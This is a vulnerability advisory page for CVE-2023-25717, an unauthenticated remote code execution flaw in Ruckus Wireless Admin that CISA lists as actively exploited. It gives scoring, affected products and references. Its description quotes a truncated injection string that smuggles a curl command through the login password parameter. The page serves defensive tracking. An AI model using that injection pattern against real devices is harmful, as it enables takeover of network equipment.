CVE-2023-25717

CRITICAL · CISA KEV
Published Feb 13, 2023 (3y ago) · Last Modified Jun 17, 2026 (2w ago)
9.8 CVSS 3.1 (Critical)
KEV Listed May 12, 2023 (3y ago)
KEV Due Jun 2, 2023 (1125d overdue)

Description

Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request, as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl substring.

CVSS Details

Base Score: 9.8
Exploitability: 3.9
Impact: 5.9
Vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Threat Intelligence

CISA Known Exploited (Overdue 1125d)
Added: May 12, 2023
Due: Jun 2, 2023

Apply updates per vendor instructions or disconnect product if it is end-of-life.

Exploit & Patch Status
Actively Exploited (KEV)
Patch Available

Weaknesses (1)

CWE-94 Improper Control of Generation of Code (Code Injection); category: Injection

Affected Products (103)

Vendor           Product                     Version       Range
ruckuswireless   ruckus_wireless_admin       *             ≤10.4
ruckuswireless   smartzone_ap                *             <6.1.0.0.9240
ruckuswireless   e510                        *             any
ruckuswireless   h320                        *             any
ruckuswireless   h350                        *             any
ruckuswireless   h510                        *             any
ruckuswireless   h550                        *             any
ruckuswireless   m510                        *             any
ruckuswireless   r310                        *             any
ruckuswireless   r320                        *             any
ruckuswireless   r350                        *             any
ruckuswireless   r510                        *             any
ruckuswireless   r550                        *             any
ruckuswireless   r610                        *             any
ruckuswireless   r650                        *             any
ruckuswireless   r710                        *             any
ruckuswireless   r720                        *             any
ruckuswireless   r730                        *             any
ruckuswireless   r750                        *             any
ruckuswireless   r760                        *             any
ruckuswireless   r850                        *             any
ruckuswireless   sz-144                      *             any
ruckuswireless   sz100                       *             any
ruckuswireless   sz300                       *             any
ruckuswireless   t310c                       *             any
ruckuswireless   t310d                       *             any
ruckuswireless   t310n                       *             any
ruckuswireless   t310s                       *             any
ruckuswireless   t350c                       *             any
ruckuswireless   t350d                       *             any
ruckuswireless   t350se                      *             any
ruckuswireless   t610                        *             any
ruckuswireless   t710                        *             any
ruckuswireless   t710s                       *             any
ruckuswireless   t750                        *             any
ruckuswireless   t750se                      *             any
ruckuswireless   t811-cm                     *             any

ruckuswireless   ruckus_wireless_admin       *             ≤10.4
ruckuswireless   smartzone_ap                *             <5.2.2.0.2064
ruckuswireless   e510                        *             any
ruckuswireless   h320                        *             any
ruckuswireless   h510                        *             any
ruckuswireless   m510                        *             any
ruckuswireless   r310                        *             any
ruckuswireless   r320                        *             any
ruckuswireless   r500                        *             any
ruckuswireless   r510                        *             any
ruckuswireless   r550                        *             any
ruckuswireless   r600                        *             any
ruckuswireless   r610                        *             any
ruckuswireless   r650                        *             any
ruckuswireless   r710                        *             any
ruckuswireless   r720                        *             any
ruckuswireless   r730                        *             any
ruckuswireless   r750                        *             any
ruckuswireless   r850                        *             any
ruckuswireless   t300                        *             any
ruckuswireless   t301n                       *             any
ruckuswireless   t301s                       *             any
ruckuswireless   t310c                       *             any
ruckuswireless   t310d                       *             any
ruckuswireless   t310n                       *             any
ruckuswireless   t310s                       *             any
ruckuswireless   t504                        *             any
ruckuswireless   t610                        *             any
ruckuswireless   t710                        *             any
ruckuswireless   t710s                       *             any
ruckuswireless   t750                        *             any
ruckuswireless   t750se                      *             any
ruckuswireless   t811-cm                     *             any

ruckuswireless   ruckus_wireless_admin       *             ≤10.4
ruckuswireless   smartzone_ap                *             <3.6.2.0.795
ruckuswireless   h500                        *             any
ruckuswireless   r300                        *             any
ruckuswireless   r700                        *             any

ruckuswireless   ruckus_wireless_admin       *             ≤10.4
ruckuswireless   smartzone_ap                *             <6.1.1.0.1274
ruckuswireless   r560                        *             any

ruckuswireless   ruckus_wireless_admin       *             ≤10.4
commscope        ruckus_smartzone_firmware   *             <5.2.1.3
ruckuswireless   sz-144                      *             any
ruckuswireless   sz300                       *             any

ruckuswireless   ruckus_wireless_admin       *             ≤10.4
commscope        ruckus_smartzone_firmware   6.1.0.0.935   any
ruckuswireless   sz-144                      *             any
ruckuswireless   sz100                       *             any
ruckuswireless   sz300                       *             any

ruckuswireless   ruckus_wireless_admin       *             ≤10.4
ruckuswireless   m510-jp                     *             any
ruckuswireless   p300                        *             any
ruckuswireless   q410                        *             any
ruckuswireless   q710                        *             any
ruckuswireless   q910                        *             any
ruckuswireless   t811-cm\(non-spf\)          *             any
ruckuswireless   zd1000                      *             any
ruckuswireless   zd1100                      *             any
ruckuswireless   zd1200                      *             any
ruckuswireless   zd3000                      *             any
ruckuswireless   zd5000                      *             any

ruckuswireless   ruckus_wireless_admin       *             ≤10.4
commscope        ruckus_smartzone_firmware   *             <5.2.1.3.1695
ruckuswireless   sz-144-federal              *             any
ruckuswireless   sz300-federal               *             any

References (3)

  • cybir.com https://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/
    Exploit, Third Party Advisory
  • support.ruckuswireless.com https://support.ruckuswireless.com/security_bulletins/315
    Patch, Product, Vendor Advisory
  • cisa.gov https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-25717
    US Government Resource

Remediation